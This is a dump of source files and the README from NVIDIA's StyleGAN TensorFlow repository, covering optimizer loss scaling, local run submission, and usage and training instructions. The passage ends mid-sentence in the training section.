opt = self._dev_opt[dev] ls_var = self.get_loss_scaling_var(dev) if not self.use_loss_scaling: ops.append(tf.cond(grad_ok, lambda: opt.apply_gradients(grads), tf.no_op)) else: ops.append(tf.cond(grad_ok, lambda: tf.group(tf.assign_add(ls_var, self.loss_scaling_inc), opt.apply_gradients(grads)), lambda: tf.group(tf.assign_sub(ls_var, self.loss_scaling_dec)))) # Report statistics on the last device. if dev == devices[-1]: with tf.name_scope("Statistics"): ops.append(autosummary.autosummary(self.id + "/learning_rate", self.learning_rate)) ops.append(autosummary.autosummary(self.id + "/overflow_frequency", tf.where(grad_ok, 0, 1))) if self.use_loss_scaling: ops.append(autosummary.autosummary(self.id + "/loss_scaling_log2", ls_var)) # Initialize variables and group everything into a single op. self.reset_optimizer_state() tfutil.init_uninitialized_vars(list(self._dev_ls_var.values())) return tf.group(*ops, name="TrainingOp") def reset_optimizer_state(self) -> None: """Reset internal state of the underlying optimizer.""" tfutil.assert_tf_initialized() tfutil.run([var.initializer for opt in self._dev_opt.values() for var in opt.variables()]) def get_loss_scaling_var(self, device: str) -> Union[tf.Variable, None]: """Get or create variable representing log2 of the current dynamic loss scaling factor.""" if not self.use_loss_scaling: return None if device not in self._dev_ls_var: with tfutil.absolute_name_scope(self.scope + "/LossScalingVars"), tf.control_dependencies(None): self._dev_ls_var[device] = tf.Variable(np.float32(self.loss_scaling_init), name="loss_scaling_var") return self._dev_ls_var[device] def apply_loss_scaling(self, value: TfExpression) -> TfExpression: """Apply dynamic loss scaling for the given expression.""" assert tfutil.is_tf_expression(value) if not self.use_loss_scaling: return value return value * tfutil.exp2(self.get_loss_scaling_var(value.device)) def undo_loss_scaling(self, value: TfExpression) -> TfExpression: """Undo the effect of dynamic loss scaling for the given expression.""" assert tfutil.is_tf_expression(value) if not self.use_loss_scaling: return value return value * tfutil.exp2(-self.get_loss_scaling_var(value.device)) # pylint: disable=invalid-unary-operand-type File: dnnlib/submission/submit.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Submit a function to be run either locally or in a computing cluster.""" import copy import io import os import pathlib import pickle import platform import pprint import re import shutil import time import traceback import zipfile from enum import Enum from .. import util from ..util import EasyDict class SubmitTarget(Enum): """The target where the function should be run. LOCAL: Run it locally. """ LOCAL = 1 class PathType(Enum): """Determines in which format should a path be formatted. WINDOWS: Format with Windows style. LINUX: Format with Linux/Posix style. AUTO: Use current OS type to select either WINDOWS or LINUX. """ WINDOWS = 1 LINUX = 2 AUTO = 3 _user_name_override = None class SubmitConfig(util.EasyDict): """Strongly typed config dict needed to submit runs. Attributes: run_dir_root: Path to the run dir root. Can be optionally templated with tags. Needs to always be run through get_path_from_template. run_desc: Description of the run. Will be used in the run dir and task name. run_dir_ignore: List of file patterns used to ignore files when copying files to the run dir. run_dir_extra_files: List of (abs_path, rel_path) tuples of file paths. rel_path root will be the src directory inside the run dir. submit_target: Submit target enum value. Used to select where the run is actually launched. num_gpus: Number of GPUs used/requested for the run. print_info: Whether to print debug information when submitting. ask_confirmation: Whether to ask a confirmation before submitting. run_id: Automatically populated value during submit. run_name: Automatically populated value during submit. run_dir: Automatically populated value during submit. run_func_name: Automatically populated value during submit. run_func_kwargs: Automatically populated value during submit. user_name: Automatically populated value during submit. Can be set by the user which will then override the automatic value. task_name: Automatically populated value during submit. host_name: Automatically populated value during submit. """ def __init__(self): super().__init__() # run (set these) self.run_dir_root = "" # should always be passed through get_path_from_template self.run_desc = "" self.run_dir_ignore = ["__pycache__", "*.pyproj", "*.sln", "*.suo", ".cache", ".idea", ".vs", ".vscode"] self.run_dir_extra_files = None # submit (set these) self.submit_target = SubmitTarget.LOCAL self.num_gpus = 1 self.print_info = False self.ask_confirmation = False # (automatically populated) self.run_id = None self.run_name = None self.run_dir = None self.run_func_name = None self.run_func_kwargs = None self.user_name = None self.task_name = None self.host_name = "localhost" def get_path_from_template(path_template: str, path_type: PathType = PathType.AUTO) -> str: """Replace tags in the given path template and return either Windows or Linux formatted path.""" # automatically select path type depending on running OS if path_type == PathType.AUTO: if platform.system() == "Windows": path_type = PathType.WINDOWS elif platform.system() == "Linux": path_type = PathType.LINUX else: raise RuntimeError("Unknown platform") path_template = path_template.replace("<USERNAME>", get_user_name()) # return correctly formatted path if path_type == PathType.WINDOWS: return str(pathlib.PureWindowsPath(path_template)) elif path_type == PathType.LINUX: return str(pathlib.PurePosixPath(path_template)) else: raise RuntimeError("Unknown platform") def get_template_from_path(path: str) -> str: """Convert a normal path back to its template representation.""" # replace all path parts with the template tags path = path.replace("\\", "/") return path def convert_path(path: str, path_type: PathType = PathType.AUTO) -> str: """Convert a normal path to template and the convert it back to a normal path with given path type.""" path_template = get_template_from_path(path) path = get_path_from_template(path_template, path_type) return path def set_user_name_override(name: str) -> None: """Set the global username override value.""" global _user_name_override _user_name_override = name def get_user_name(): """Get the current user name.""" if _user_name_override is not None: return _user_name_override elif platform.system() == "Windows": return os.getlogin() elif platform.system() == "Linux": try: import pwd # pylint: disable=import-error return pwd.getpwuid(os.geteuid()).pw_name # pylint: disable=no-member except: return "unknown" else: raise RuntimeError("Unknown platform") def _create_run_dir_local(submit_config: SubmitConfig) -> str: """Create a new run dir with increasing ID number at the start.""" run_dir_root = get_path_from_template(submit_config.run_dir_root, PathType.AUTO) if not os.path.exists(run_dir_root): print("Creating the run dir root: {}".format(run_dir_root)) os.makedirs(run_dir_root) submit_config.run_id = _get_next_run_id_local(run_dir_root) submit_config.run_name = "{0:05d}-{1}".format(submit_config.run_id, submit_config.run_desc) run_dir = os.path.join(run_dir_root, submit_config.run_name) if os.path.exists(run_dir): raise RuntimeError("The run dir already exists! ({0})".format(run_dir)) print("Creating the run dir: {}".format(run_dir)) os.makedirs(run_dir) return run_dir def _get_next_run_id_local(run_dir_root: str) -> int: """Reads all directory names in a given directory (non-recursive) and returns the next (increasing) run id. Assumes IDs are numbers at the start of the directory names.""" dir_names = [d for d in os.listdir(run_dir_root) if os.path.isdir(os.path.join(run_dir_root, d))] r = re.compile("^\\d+") # match one or more digits at the start of the string run_id = 0 for dir_name in dir_names: m = r.match(dir_name) if m is not None: i = int(m.group()) run_id = max(run_id, i + 1) return run_id def _populate_run_dir(run_dir: str, submit_config: SubmitConfig) -> None: """Copy all necessary files into the run dir. Assumes that the dir exists, is local, and is writable.""" print("Copying files to the run dir") files = [] run_func_module_dir_path = util.get_module_dir_by_obj_name(submit_config.run_func_name) assert '.' in submit_config.run_func_name for _idx in range(submit_config.run_func_name.count('.') - 1): run_func_module_dir_path = os.path.dirname(run_func_module_dir_path) files += util.list_dir_recursively_with_ignore(run_func_module_dir_path, ignores=submit_config.run_dir_ignore, add_base_to_relative=False) dnnlib_module_dir_path = util.get_module_dir_by_obj_name("dnnlib") files += util.list_dir_recursively_with_ignore(dnnlib_module_dir_path, ignores=submit_config.run_dir_ignore, add_base_to_relative=True) if submit_config.run_dir_extra_files is not None: files += submit_config.run_dir_extra_files files = [(f[0], os.path.join(run_dir, "src", f[1])) for f in files] files += [(os.path.join(dnnlib_module_dir_path, "submission", "_internal", "run.py"), os.path.join(run_dir, "run.py"))] util.copy_files_and_create_dirs(files) pickle.dump(submit_config, open(os.path.join(run_dir, "submit_config.pkl"), "wb")) with open(os.path.join(run_dir, "submit_config.txt"), "w") as f: pprint.pprint(submit_config, stream=f, indent=4, width=200, compact=False) def run_wrapper(submit_config: SubmitConfig) -> None: """Wrap the actual run function call for handling logging, exceptions, typing, etc.""" is_local = submit_config.submit_target == SubmitTarget.LOCAL checker = None # when running locally, redirect stderr to stdout, log stdout to a file, and force flushing if is_local: logger = util.Logger(file_name=os.path.join(submit_config.run_dir, "log.txt"), file_mode="w", should_flush=True) else: # when running in a cluster, redirect stderr to stdout, and just force flushing (log writing is handled by run.sh) logger = util.Logger(file_name=None, should_flush=True) import dnnlib dnnlib.submit_config = submit_config try: print("dnnlib: Running {0}() on {1}...".format(submit_config.run_func_name, submit_config.host_name)) start_time = time.time() util.call_func_by_name(func_name=submit_config.run_func_name, submit_config=submit_config, **submit_config.run_func_kwargs) print("dnnlib: Finished {0}() in {1}.".format(submit_config.run_func_name, util.format_time(time.time() - start_time))) except: if is_local: raise else: traceback.print_exc() log_src = os.path.join(submit_config.run_dir, "log.txt") log_dst = os.path.join(get_path_from_template(submit_config.run_dir_root), "{0}-error.txt".format(submit_config.run_name)) shutil.copyfile(log_src, log_dst) finally: open(os.path.join(submit_config.run_dir, "_finished.txt"), "w").close() dnnlib.submit_config = None logger.close() if checker is not None: checker.stop() def submit_run(submit_config: SubmitConfig, run_func_name: str, **run_func_kwargs) -> None: """Create a run dir, gather files related to the run, copy files to the run dir, and launch the run in appropriate place.""" submit_config = copy.copy(submit_config) if submit_config.user_name is None: submit_config.user_name = get_user_name() submit_config.run_func_name = run_func_name submit_config.run_func_kwargs = run_func_kwargs assert submit_config.submit_target == SubmitTarget.LOCAL if submit_config.submit_target in {SubmitTarget.LOCAL}: run_dir = _create_run_dir_local(submit_config) submit_config.task_name = "{0}-{1:05d}-{2}".format(submit_config.user_name, submit_config.run_id, submit_config.run_desc) submit_config.run_dir = run_dir _populate_run_dir(run_dir, submit_config) if submit_config.print_info: print("\nSubmit config:\n") pprint.pprint(submit_config, indent=4, width=200, compact=False) print() if submit_config.ask_confirmation: if not util.ask_yes_no("Continue submitting the job?"): return run_wrapper(submit_config) File: dnnlib/submission/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . import run_context from . import submit File: dnnlib/submission/run_context.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helpers for managing the run/training loop.""" import datetime import json import os import pprint import time import types from typing import Any from . import submit class RunContext(object): """Helper class for managing the run/training loop. The context will hide the implementation details of a basic run/training loop. It will set things up properly, tell if run should be stopped, and then cleans up. User should call update periodically and use should_stop to determine if run should be stopped. Args: submit_config: The SubmitConfig that is used for the current run. config_module: The whole config module that is used for the current run. max_epoch: Optional cached value for the max_epoch variable used in update. """ def __init__(self, submit_config: submit.SubmitConfig, config_module: types.ModuleType = None, max_epoch: Any = None): self.submit_config = submit_config self.should_stop_flag = False self.has_closed = False self.start_time = time.time() self.last_update_time = time.time() self.last_update_interval = 0.0 self.max_epoch = max_epoch # pretty print the all the relevant content of the config module to a text file if config_module is not None: with open(os.path.join(submit_config.run_dir, "config.txt"), "w") as f: filtered_dict = {k: v for k, v in config_module.__dict__.items() if not k.startswith("_") and not isinstance(v, (types.ModuleType, types.FunctionType, types.LambdaType, submit.SubmitConfig, type))} pprint.pprint(filtered_dict, stream=f, indent=4, width=200, compact=False) # write out details about the run to a text file self.run_txt_data = {"task_name": submit_config.task_name, "host_name": submit_config.host_name, "start_time": datetime.datetime.now().isoformat(sep=" ")} with open(os.path.join(submit_config.run_dir, "run.txt"), "w") as f: pprint.pprint(self.run_txt_data, stream=f, indent=4, width=200, compact=False) def __enter__(self) -> "RunContext": return self def __exit__(self, exc_type: Any, exc_value: Any, traceback: Any) -> None: self.close() def update(self, loss: Any = 0, cur_epoch: Any = 0, max_epoch: Any = None) -> None: """Do general housekeeping and keep the state of the context up-to-date. Should be called often enough but not in a tight loop.""" assert not self.has_closed self.last_update_interval = time.time() - self.last_update_time self.last_update_time = time.time() if os.path.exists(os.path.join(self.submit_config.run_dir, "abort.txt")): self.should_stop_flag = True max_epoch_val = self.max_epoch if max_epoch is None else max_epoch def should_stop(self) -> bool: """Tell whether a stopping condition has been triggered one way or another.""" return self.should_stop_flag def get_time_since_start(self) -> float: """How much time has passed since the creation of the context.""" return time.time() - self.start_time def get_time_since_last_update(self) -> float: """How much time has passed since the last call to update.""" return time.time() - self.last_update_time def get_last_update_interval(self) -> float: """How much time passed between the previous two calls to update.""" return self.last_update_interval def close(self) -> None: """Close the context and clean up. Should only be called once.""" if not self.has_closed: # update the run.txt with stopping time self.run_txt_data["stop_time"] = datetime.datetime.now().isoformat(sep=" ") with open(os.path.join(self.submit_config.run_dir, "run.txt"), "w") as f: pprint.pprint(self.run_txt_data, stream=f, indent=4, width=200, compact=False) self.has_closed = True File: dnnlib/submission/_internal/run.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for launching run functions in computing clusters. During the submit process, this file is copied to the appropriate run dir. When the job is launched in the cluster, this module is the first thing that is run inside the docker container. """ import os import pickle import sys # PYTHONPATH should have been set so that the run_dir/src is in it import dnnlib def main(): if not len(sys.argv) >= 4: raise RuntimeError("This script needs three arguments: run_dir, task_name and host_name!") run_dir = str(sys.argv[1]) task_name = str(sys.argv[2]) host_name = str(sys.argv[3]) submit_config_path = os.path.join(run_dir, "submit_config.pkl") # SubmitConfig should have been pickled to the run dir if not os.path.exists(submit_config_path): raise RuntimeError("SubmitConfig pickle file does not exist!") submit_config: dnnlib.SubmitConfig = pickle.load(open(submit_config_path, "rb")) dnnlib.submission.submit.set_user_name_override(submit_config.user_name) submit_config.task_name = task_name submit_config.host_name = host_name dnnlib.submission.submit.run_wrapper(submit_config) if __name__ == "__main__": main()
## StyleGAN &mdash; Official TensorFlow Implementation ![Python 3.6](https://img.shields.io/badge/python-3.6-green.svg?style=plastic) ![TensorFlow 1.10](https://img.shields.io/badge/tensorflow-1.10-green.svg?style=plastic) ![cuDNN 7.3.1](https://img.shields.io/badge/cudnn-7.3.1-green.svg?style=plastic) ![License CC BY-NC](https://img.shields.io/badge/license-CC_BY--NC-green.svg?style=plastic) ![Teaser image](./stylegan-teaser.png) **Picture:** *These people are not real &ndash; they were produced by our generator that allows control over different aspects of the image.* This repository contains the official TensorFlow implementation of the following paper: > **A Style-Based Generator Architecture for Generative Adversarial Networks**<br> > Tero Karras (NVIDIA), Samuli Laine (NVIDIA), Timo Aila (NVIDIA)<br> > https://arxiv.org/abs/1812.04948 > > **Abstract:** *We propose an alternative generator architecture for generative adversarial networks, borrowing from style transfer literature. The new architecture leads to an automatically learned, unsupervised separation of high-level attributes (e.g., pose and identity when trained on human faces) and stochastic variation in the generated images (e.g., freckles, hair), and it enables intuitive, scale-specific control of the synthesis. The new generator improves the state-of-the-art in terms of traditional distribution quality metrics, leads to demonstrably better interpolation properties, and also better disentangles the latent factors of variation. To quantify interpolation quality and disentanglement, we propose two new, automated methods that are applicable to any generator architecture. Finally, we introduce a new, highly varied and high-quality dataset of human faces.* For business inquiries, please visit our website and submit the form: [NVIDIA Research Licensing](https://www.nvidia.com/en-us/research/inquiries/) **&#9733;&#9733;&#9733; NEW: [StyleGAN2-ADA-PyTorch](https://github.com/NVlabs/stylegan2-ada-pytorch) is now available; see the full list of versions [here](https://nvlabs.github.io/stylegan2/versions.html) &#9733;&#9733;&#9733;** ## Resources Material related to our paper is available via the following links: - Paper: https://arxiv.org/abs/1812.04948 - Video: https://youtu.be/kSLJriaOumA - Code: https://github.com/NVlabs/stylegan - FFHQ: https://github.com/NVlabs/ffhq-dataset Additional material can be found on Google Drive: | Path | Description | :--- | :---------- | [StyleGAN](https://drive.google.com/open?id=1uka3a1noXHAydRPRbknqwKVGODvnmUBX) | Main folder. | &boxvr;&nbsp; [stylegan-paper.pdf](https://drive.google.com/open?id=1v-HkF3Ehrpon7wVIx4r5DLcko_U_V6Lt) | High-quality version of the paper PDF. | &boxvr;&nbsp; [stylegan-video.mp4](https://drive.google.com/open?id=1uzwkZHQX_9pYg1i0d1Nbe3D9xPO8-qBf) | High-quality version of the result video. | &boxvr;&nbsp; [images](https://drive.google.com/open?id=1-l46akONUWF6LCpDoeq63H53rD7MeiTd) | Example images produced using our generator. | &boxv;&nbsp; &boxvr;&nbsp; [representative-images](https://drive.google.com/open?id=1ToY5P4Vvf5_c3TyUizQ8fckFFoFtBvD8) | High-quality images to be used in articles, blog posts, etc. | &boxv;&nbsp; &boxur;&nbsp; [100k-generated-images](https://drive.google.com/open?id=100DJ0QXyG89HZzB4w2Cbyf4xjNK54cQ1) | 100,000 generated images for different amounts of truncation. | &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [ffhq-1024x1024](https://drive.google.com/open?id=14lm8VRN1pr4g_KVe6_LvyDX1PObst6d4) | Generated using Flickr-Faces-HQ dataset at 1024&times;1024. | &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [bedrooms-256x256](https://drive.google.com/open?id=1Vxz9fksw4kgjiHrvHkX4Hze4dyThFW6t) | Generated using LSUN Bedroom dataset at 256&times;256. | &boxv;&nbsp; &ensp;&ensp; &boxvr;&nbsp; [cars-512x384](https://drive.google.com/open?id=1MFCvOMdLE2_mpeLPTiDw5dxc2CRuKkzS) | Generated using LSUN Car dataset at 512&times;384. | &boxv;&nbsp; &ensp;&ensp; &boxur;&nbsp; [cats-256x256](https://drive.google.com/open?id=1gq-Gj3GRFiyghTPKhp8uDMA9HV_0ZFWQ) | Generated using LSUN Cat dataset at 256&times;256. | &boxvr;&nbsp; [videos](https://drive.google.com/open?id=1N8pOd_Bf8v89NGUaROdbD8-ayLPgyRRo) | Example videos produced using our generator. | &boxv;&nbsp; &boxur;&nbsp; [high-quality-video-clips](https://drive.google.com/open?id=1NFO7_vH0t98J13ckJYFd7kuaTkyeRJ86) | Individual segments of the result video as high-quality MP4. | &boxvr;&nbsp; [ffhq-dataset](https://drive.google.com/open?id=1u2xu7bSrWxrbUxk-dT-UvEJq8IjdmNTP) | Raw data for the [Flickr-Faces-HQ dataset](https://github.com/NVlabs/ffhq-dataset). | &boxur;&nbsp; [networks](https://drive.google.com/open?id=1MASQyN5m0voPcx7-9K0r5gObhvvPups7) | Pre-trained networks as pickled instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py). | &ensp;&ensp; &boxvr;&nbsp; [stylegan-ffhq-1024x1024.pkl](https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ) | StyleGAN trained with Flickr-Faces-HQ dataset at 1024&times;1024. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-celebahq-1024x1024.pkl](https://drive.google.com/uc?id=1MGqJl28pN4t7SAtSrPdSRJSQJqahkzUf) | StyleGAN trained with CelebA-HQ dataset at 1024&times;1024. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-bedrooms-256x256.pkl](https://drive.google.com/uc?id=1MOSKeGF0FJcivpBI7s63V9YHloUTORiF) | StyleGAN trained with LSUN Bedroom dataset at 256&times;256. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-cars-512x384.pkl](https://drive.google.com/uc?id=1MJ6iCfNtMIRicihwRorsM3b7mmtmK9c3) | StyleGAN trained with LSUN Car dataset at 512&times;384. | &ensp;&ensp; &boxvr;&nbsp; [stylegan-cats-256x256.pkl](https://drive.google.com/uc?id=1MQywl0FNt6lHu8E_EUqnRbviagS7fbiJ) | StyleGAN trained with LSUN Cat dataset at 256&times;256. | &ensp;&ensp; &boxur;&nbsp; [metrics](https://drive.google.com/open?id=1MvYdWCBuMfnoYGptRH-AgKLbPTsIQLhl) | Auxiliary networks for the quality and disentanglement metrics. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [inception_v3_features.pkl](https://drive.google.com/uc?id=1MzTY44rLToO5APn8TZmfR7_ENSe5aZUn) | Standard [Inception-v3](https://arxiv.org/abs/1512.00567) classifier that outputs a raw feature vector. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [vgg16_zhang_perceptual.pkl](https://drive.google.com/uc?id=1N2-m9qszOeVC9Tq77WxsLnuWwOedQiD2) | Standard [LPIPS](https://arxiv.org/abs/1801.03924) metric to estimate perceptual similarity. | &ensp;&ensp; &ensp;&ensp; &boxvr;&nbsp; [celebahq-classifier-00-male.pkl](https://drive.google.com/uc?id=1Q5-AI6TwWhCVM7Muu4tBM7rp5nG_gmCX) | Binary classifier trained to detect a single attribute of CelebA-HQ. | &ensp;&ensp; &ensp;&ensp; &boxur;&nbsp;&#x22ef; | Please see the file listing for remaining networks. ## Licenses All material, excluding the Flickr-Faces-HQ dataset, is made available under [Creative Commons BY-NC 4.0](https://creativecommons.org/licenses/by-nc/4.0/) license by NVIDIA Corporation. You can **use, redistribute, and adapt** the material for **non-commercial purposes**, as long as you give appropriate credit by **citing our paper** and **indicating any changes** that you've made. For license information regarding the FFHQ dataset, please refer to the [Flickr-Faces-HQ repository](https://github.com/NVlabs/ffhq-dataset). `inception_v3_features.pkl` and `inception_v3_softmax.pkl` are derived from the pre-trained [Inception-v3](https://arxiv.org/abs/1512.00567) network by Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens, and Zbigniew Wojna. The network was originally shared under [Apache 2.0](https://github.com/tensorflow/models/blob/master/LICENSE) license on the [TensorFlow Models](https://github.com/tensorflow/models) repository. `vgg16.pkl` and `vgg16_zhang_perceptual.pkl` are derived from the pre-trained [VGG-16](https://arxiv.org/abs/1409.1556) network by Karen Simonyan and Andrew Zisserman. The network was originally shared under [Creative Commons BY 4.0](https://creativecommons.org/licenses/by/4.0/) license on the [Very Deep Convolutional Networks for Large-Scale Visual Recognition](http://www.robots.ox.ac.uk/~vgg/research/very_deep/) project page. `vgg16_zhang_perceptual.pkl` is further derived from the pre-trained [LPIPS](https://arxiv.org/abs/1801.03924) weights by Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, and Oliver Wang. The weights were originally shared under [BSD 2-Clause "Simplified" License](https://github.com/richzhang/PerceptualSimilarity/blob/master/LICENSE) on the [PerceptualSimilarity](https://github.com/richzhang/PerceptualSimilarity) repository. ## System requirements * Both Linux and Windows are supported, but we strongly recommend Linux for performance and compatibility reasons. * 64-bit Python 3.6 installation. We recommend Anaconda3 with numpy 1.14.3 or newer. * TensorFlow 1.10.0 or newer with GPU support. * One or more high-end NVIDIA GPUs with at least 11GB of DRAM. We recommend NVIDIA DGX-1 with 8 Tesla V100 GPUs. * NVIDIA driver 391.35 or newer, CUDA toolkit 9.0 or newer, cuDNN 7.3.1 or newer. ## Using pre-trained networks A minimal example of using a pre-trained StyleGAN generator is given in [pretrained_example.py](./pretrained_example.py). When executed, the script downloads a pre-trained StyleGAN generator from Google Drive and uses it to generate an image: ``` > python pretrained_example.py Downloading https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ .... done Gs Params OutputShape WeightShape --- --- --- --- latents_in - (?, 512) - ... images_out - (?, 3, 1024, 1024) - --- --- --- --- Total 26219627 > ls results example.png # https://drive.google.com/uc?id=1UDLT_zb-rof9kKH0GwiJW_bS9MoZi8oP ``` A more advanced example is given in [generate_figures.py](./generate_figures.py). The script reproduces the figures from our paper in order to illustrate style mixing, noise inputs, and truncation: ``` > python generate_figures.py results/figure02-uncurated-ffhq.png # https://drive.google.com/uc?id=1U3r1xgcD7o-Fd0SBRpq8PXYajm7_30cu results/figure03-style-mixing.png # https://drive.google.com/uc?id=1U-nlMDtpnf1RcYkaFQtbh5oxnhA97hy6 results/figure04-noise-detail.png # https://drive.google.com/uc?id=1UX3m39u_DTU6eLnEW6MqGzbwPFt2R9cG results/figure05-noise-components.png # https://drive.google.com/uc?id=1UQKPcvYVeWMRccGMbs2pPD9PVv1QDyp_ results/figure08-truncation-trick.png # https://drive.google.com/uc?id=1ULea0C12zGlxdDQFNLXOWZCHi3QNfk_v results/figure10-uncurated-bedrooms.png # https://drive.google.com/uc?id=1UEBnms1XMfj78OHj3_cx80mUf_m9DUJr results/figure11-uncurated-cars.png # https://drive.google.com/uc?id=1UO-4JtAs64Kun5vIj10UXqAJ1d5Ir1Ke results/figure12-uncurated-cats.png # https://drive.google.com/uc?id=1USnJc14prlu3QAYxstrtlfXC9sDWPA-W ``` The pre-trained networks are stored as standard pickle files on Google Drive: ``` # Load pre-trained network. url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f: _G, _D, Gs = pickle.load(f) # _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run. # _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run. # Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot. ``` The above code downloads the file and unpickles it to yield 3 instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py). To generate images, you will typically want to use `Gs` &ndash; the other two networks are provided for completeness. In order for `pickle.load()` to work, you will need to have the `dnnlib` source directory in your PYTHONPATH and a `tf.Session` set as default. The session can initialized by calling `dnnlib.tflib.init_tf()`. There are three ways to use the pre-trained generator: 1. Use `Gs.run()` for immediate-mode operation where the inputs and outputs are numpy arrays: ``` # Pick latent vector. rnd = np.random.RandomState(5) latents = rnd.randn(1, Gs.input_shape[1]) # Generate image. fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True) images = Gs.run(latents, None, truncation_psi=0.7, randomize_noise=True, output_transform=fmt) ``` The first argument is a batch of latent vectors of shape `[num, 512]`. The second argument is reserved for class labels (not used by StyleGAN). The remaining keyword arguments are optional and can be used to further modify the operation (see below). The output is a batch of images, whose format is dictated by the `output_transform` argument. 2. Use `Gs.get_output_for()` to incorporate the generator as a part of a larger TensorFlow expression: ``` latents = tf.random_normal([self.minibatch_per_gpu] + Gs_clone.input_shape[1:]) images = Gs_clone.get_output_for(latents, None, is_validation=True, randomize_noise=True) images = tflib.convert_images_to_uint8(images) result_expr.append(inception_clone.get_output_for(images)) ``` The above code is from [metrics/frechet_inception_distance.py](./metrics/frechet_inception_distance.py). It generates a batch of random images and feeds them directly to the [Inception-v3](https://arxiv.org/abs/1512.00567) network without having to convert the data to numpy arrays in between. 3. Look up `Gs.components.mapping` and `Gs.components.synthesis` to access individual sub-networks of the generator. Similar to `Gs`, the sub-networks are represented as independent instances of [dnnlib.tflib.Network](./dnnlib/tflib/network.py): ``` src_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in src_seeds) src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component] src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs) ``` The above code is from [generate_figures.py](./generate_figures.py). It first transforms a batch of latent vectors into the intermediate *W* space using the mapping network and then turns these vectors into a batch of images using the synthesis network. The `dlatents` array stores a separate copy of the same *w* vector for each layer of the synthesis network to facilitate style mixing. The exact details of the generator are defined in [training/networks_stylegan.py](./training/networks_stylegan.py) (see `G_style`, `G_mapping`, and `G_synthesis`). The following keyword arguments can be specified to modify the behavior when calling `run()` and `get_output_for()`: * `truncation_psi` and `truncation_cutoff` control the truncation trick that that is performed by default when using `Gs` (&psi;=0.7, cutoff=8). It can be disabled by setting `truncation_psi=1` or `is_validation=True`, and the image quality can be further improved at the cost of variation by setting e.g. `truncation_psi=0.5`. Note that truncation is always disabled when using the sub-networks directly. The average *w* needed to manually perform the truncation trick can be looked up using `Gs.get_var('dlatent_avg')`. * `randomize_noise` determines whether to use re-randomize the noise inputs for each generated image (`True`, default) or whether to use specific noise values for the entire minibatch (`False`). The specific values can be accessed via the `tf.Variable` instances that are found using `[var for name, var in Gs.components.synthesis.vars.items() if name.startswith('noise')]`. * When using the mapping network directly, you can specify `dlatent_broadcast=None` to disable the automatic duplication of `dlatents` over the layers of the synthesis network. * Runtime performance can be fine-tuned via `structure='fixed'` and `dtype='float16'`. The former disables support for progressive growing, which is not needed for a fully-trained generator, and the latter performs all computation using half-precision floating point arithmetic. ## Preparing datasets for training The training and evaluation scripts operate on datasets stored as multi-resolution TFRecords. Each dataset is represented by a directory containing the same image data in several resolutions to enable efficient streaming. There is a separate *.tfrecords file for each resolution, and if the dataset contains labels, they are stored in a separate file as well. By default, the scripts expect to find the datasets at `datasets/<NAME>/<NAME>-<RESOLUTION>.tfrecords`. The directory can be changed by editing [config.py](./config.py): ``` result_dir = 'results' data_dir = 'datasets' cache_dir = 'cache' ``` To obtain the FFHQ dataset (`datasets/ffhq`), please refer to the [Flickr-Faces-HQ repository](https://github.com/NVlabs/ffhq-dataset). To obtain the CelebA-HQ dataset (`datasets/celebahq`), please refer to the [Progressive GAN repository](https://github.com/tkarras/progressive_growing_of_gans). To obtain other datasets, including LSUN, please consult their corresponding project pages. The datasets can be converted to multi-resolution TFRecords using the provided [dataset_tool.py](./dataset_tool.py): ``` > python dataset_tool.py create_lsun datasets/lsun-bedroom-full ~/lsun/bedroom_lmdb --resolution 256 > python dataset_tool.py create_lsun_wide datasets/lsun-car-512x384 ~/lsun/car_lmdb --width 512 --height 384 > python dataset_tool.py create_lsun datasets/lsun-cat-full ~/lsun/cat_lmdb --resolution 256 > python dataset_tool.py create_cifar10 datasets/cifar10 ~/cifar10 > python dataset_tool.py create_from_images datasets/custom-dataset ~/custom-images ``` ## Training networks Once the datasets are set up, you can train your own StyleGAN networks as follows: 1. Edit [train.py](./train.py) to specify the dataset and training configuration by uncommenting or editing specific lines. 2. Run the training script with `python train.py`. 3. The results are written to a newly created directory 